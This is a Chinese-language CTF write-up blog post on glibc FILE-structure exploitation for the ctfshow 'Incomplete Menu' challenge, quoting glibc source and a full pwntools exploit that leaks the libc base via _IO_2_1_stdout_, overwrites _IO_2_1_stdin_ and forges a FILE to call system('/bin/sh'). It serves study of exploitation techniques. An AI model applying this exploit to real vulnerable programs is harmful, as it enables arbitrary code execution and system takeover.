_IO_2_1_stdin_ 任意寫及對 _IO_2_1_stdout_ 任意讀的補充

狒猩橙發表於2022-03-06

之前寫過一篇 IO_FILE——leak 任意讀,但是在學習的時候偷懶了,沒有深入去看,這次碰到 winmt 師傅出的題,就傻眼了,故再寫一篇部落格來記錄一下。

例題 ctfshow Incomplete Menu :

洞在 edit 裡,可以超過 size 進行一個置零的操作。

這裡還是考慮利用 _IO_2_1_stdout_ 來洩露 libc 基址。這裡就出現了一個在我上篇文章中忽略的知識點。上一篇文章是通過改 flag 的一系列操作來進行,而 _IO_2_1_stdout_ 還有另一種修改方式可以洩露 libc。及使 _IO_read_end == _IO_write_base,忽略原始碼在下面:

_IO_size_t
new_do_write (_IO_FILE *fp, const char *data, _IO_size_t to_do)
{
  _IO_size_t count;
  if (fp->_flags & _IO_IS_APPENDING)
    /* On a system without a proper O_APPEND implementation,
       you would need to sys_seek(0, SEEK_END) here, but is
       not needed nor desirable for Unix- or Posix-like systems.
       Instead, just indicate that offset (before and after) is
       unpredictable. */
    fp->_offset = _IO_pos_BAD;
  else if (fp->_IO_read_end != fp->_IO_write_base)
    {
      _IO_off64_t new_pos
    = _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
      if (new_pos == _IO_pos_BAD)
    return 0;
      fp->_offset = new_pos;
    }
  count = _IO_SYSWRITE (fp, data, to_do);
  if (fp->_cur_column && count)
    fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
  _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
  fp->_IO_write_end = (fp->_mode <= 0
               && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
               ? fp->_IO_buf_base : fp->_IO_buf_end);
  return count;
}

   還有本題還有不會的地方就是利用 _IO_2_1_stdin_ 進行任意寫,走 io 的函式在讀取資料時,會先判斷緩衝區是否有資料,如果有資料,無論是否滿足需要的數量,那麼就會走緩衝區直接先取出來用,再從使用者處讀進緩衝區。故我們不能讓 _IO_read_end > _IO_read_ptr

_IO_size_t
_IO_file_xsgetn (_IO_FILE *fp, void *data, _IO_size_t n)
{
  _IO_size_t want, have;
  _IO_ssize_t count;
  char *s = data;

  want = n;

  if (fp->_IO_buf_base == NULL)
    {
      /* Maybe we already have a push back pointer.  */
      if (fp->_IO_save_base != NULL)
    {
      free (fp->_IO_save_base);
      fp->_flags &= ~_IO_IN_BACKUP;
    }
      _IO_doallocbuf (fp);
    }

  while (want > 0)
    {
      have = fp->_IO_read_end - fp->_IO_read_ptr;
      if (want <= have)
    {
      memcpy (s, fp->_IO_read_ptr, want);
      fp->_IO_read_ptr += want;
      want = 0;
    }
      else
    {
      if (have > 0)
        {
          s = __mempcpy (s, fp->_IO_read_ptr, have);
          want -= have;
          fp->_IO_read_ptr += have;
        }

      /* Check for backup and repeat */
      if (_IO_in_backup (fp))
        {
          _IO_switch_to_main_get_area (fp);
          continue;
        }

      /* If we now want less than a buffer, underflow and repeat
         the copy.  Otherwise, _IO_SYSREAD directly to
         the user buffer. */
      if (fp->_IO_buf_base
          && want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base))
        {
          if (__underflow (fp) == EOF)
        break;

          continue;
        }

      /* These must be set before the sysread as we might longjmp out
         waiting for input. */
      _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
      _IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);

      /* Try to maintain alignment: read a whole number of blocks.  */
      count = want;
      if (fp->_IO_buf_base)
        {
          _IO_size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;
          if (block_size >= 128)
        count -= want % block_size;
        }

      count = _IO_SYSREAD (fp, s, count);
      if (count <= 0)
        {
          if (count == 0)
        fp->_flags |= _IO_EOF_SEEN;
          else
        fp->_flags |= _IO_ERR_SEEN;

          break;
        }

      s += count;
      want -= count;
      if (fp->_offset != _IO_pos_BAD)
        _IO_pos_adjust (fp->_offset, count);
    }
    }

  return n - want;
}

需要注意的是本題是要控制 _IO_read_ptr - _IO_read_end < 16 ,至於為什麼,emmm也不是很好說,建議各位自己除錯看看。

winmt師傅的exp:

from pwn import *
context(arch='amd64', log_level='debug')

io = process("./pwn")
elf = ELF('./pwn')
libc = ELF("./libc-2.27.so")

def get_IO_str_jumps():
   IO_file_jumps_offset = libc.sym['_IO_file_jumps']
   IO_str_underflow_offset = libc.sym['_IO_str_underflow']
   for ref_offset in libc.search(p64(IO_str_underflow_offset)):
       possible_IO_str_jumps_offset = ref_offset - 0x20
       if possible_IO_str_jumps_offset > IO_file_jumps_offset:
          return possible_IO_str_jumps_offset

def new(size):
    io.sendlineafter(">> ", "1")
    io.sendlineafter(">> ", str(size))

def edit(index, length, content):
    io.sendlineafter(">> ", "2")
    io.sendlineafter(">> ", str(index))
    io.sendlineafter(">> ", str(length))
    io.sendafter(">> ", content)

def new_x(size):
    io.sendline("1")
    sleep(0.1)
    io.sendline(str(size))

def edit_x(index, length, content):
    io.sendline("2")
    sleep(0.1)
    io.sendline(str(index))
    sleep(0.1)
    io.sendline(str(length))
    sleep(0.1)
    io.send(content)

new(0x200000);
edit(0, 0x201000 - 0x10 + libc.sym['_IO_2_1_stdout_'] + 0x10 + 1, '\n') 
new_x(0x200000);
edit_x(1, 0x201000 * 2 - 0x10 + libc.sym['_IO_2_1_stdout_'] + 0x20 + 1, '\n')
libc_base = u64(io.recvline()[8:16]) - 0x3ed8b0
success("libc_base:\t" + hex(libc_base))

payload = p64(0)*5 + p64(1) + p64(0) + p64(libc_base + next(libc.search(b'/bin/sh')))
payload = payload.ljust(0xd8, b'\x00') + p64(libc_base + get_IO_str_jumps() - 8)
payload += p64(0) + p64(libc_base + libc.sym['system'])
new(0x200000);
edit(2, 0x201000 * 3 - 0x10 + libc.sym['_IO_2_1_stdin_'] + 0x38 + 1, payload)

payload = p64(0xfbad208b)
payload += p64(libc_base + libc.sym['_IO_list_all'] + 132)
payload += p64(libc_base + libc.sym['_IO_list_all']) * 6
payload += p64(libc_base + libc.sym['_IO_list_all'] + 0x10)
payload = payload.ljust(132, b'\x00') + p64(libc_base - (0x201000 * 3 - 0x10))

io.sendlineafter(">> ", payload)
io.interactive()

此外還有一個通過 stdout 的任意寫:

  else if (f->_IO_write_end > f->_IO_write_ptr)
    count = f->_IO_write_end - f->_IO_write_ptr; /* Space available. */

  /* Then fill the buffer. */
  if (count > 0)
    {
      if (count > to_do)
    count = to_do;
      f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
      s += count;
      to_do -= count;
    }

只需把 _IO_write_ptr 改為想要寫入的首地址, _IO_write_end 指向寫入地址的結尾(或者大一些)即可。

 

相關文章